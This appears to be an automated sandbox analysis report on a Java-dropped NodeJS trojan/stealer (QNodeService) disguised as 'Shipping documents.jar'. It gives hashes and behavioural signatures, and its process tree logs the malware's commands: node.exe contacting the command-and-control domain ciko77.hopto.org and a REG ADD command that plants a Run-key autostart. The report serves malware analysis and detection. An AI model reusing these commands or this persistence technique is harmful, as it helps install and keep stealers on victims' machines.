Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10_x64 -
resource
win10 -
submitted
22-10-2020 06:28
Static task
static1
Behavioral task
behavioral1
Sample
Shipping documents.jar
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Shipping documents.jar
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
Shipping documents.jar
-
Size
74KB
-
MD5
aca734eeac3a00205e7a64800b05cb95
-
SHA1
e09deace896a082517204f46ae3bddfc2f3f46c1
-
SHA256
726902ed1aab6fe2e7632d70bfba8fe89efc025bc76c7f63c8cbc2f73dea193e
-
SHA512
2966c44e70c9e0b2864112db107dd7194537ec71b654f173eff559a3ee4e03ecfd6ca5207a95a4cb3e8606197ab84fe12835d60c1e536a69370a103072f6f4c1
Score
10/10
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 648 node.exe 1492 node.exe 3144 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\01a5d575-b9d7-42ef-b3ec-78b85d3d11c8 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001adaf-173.dat js behavioral2/files/0x000100000001adaf-176.dat js behavioral2/files/0x000100000001adaf-180.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 wtfismyip.com 18 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 648 node.exe 648 node.exe 648 node.exe 648 node.exe 1492 node.exe 1492 node.exe 1492 node.exe 1492 node.exe 3144 node.exe 3144 node.exe 3144 node.exe 3144 node.exe 3144 node.exe 3144 node.exe 3144 node.exe 3144 node.exe 3144 node.exe 3144 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 748 wrote to memory of 1772 748 java.exe 73 PID 748 wrote to memory of 1772 748 java.exe 73 PID 1772 wrote to memory of 648 1772 javaw.exe 77 PID 1772 wrote to memory of 648 1772 javaw.exe 77 PID 648 wrote to memory of 1492 648 node.exe 79 PID 648 wrote to memory of 1492 648 node.exe 79 PID 1492 wrote to memory of 3144 1492 node.exe 80 PID 1492 wrote to memory of 3144 1492 node.exe 80 PID 3144 wrote to memory of 2488 3144 node.exe 82 PID 3144 wrote to memory of 2488 3144 node.exe 82 PID 2488 wrote to memory of 2428 2488 cmd.exe 83 PID 2488 wrote to memory of 2428 2488 cmd.exe 83
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Shipping documents.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\55636383.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain ciko77.hopto.org3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:648 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_uarFpu\boot.js --hub-domain ciko77.hopto.org4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_uarFpu\boot.js --hub-domain ciko77.hopto.org5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "01a5d575-b9d7-42ef-b3ec-78b85d3d11c8" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "01a5d575-b9d7-42ef-b3ec-78b85d3d11c8" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:2428
-
-
-
-
-
-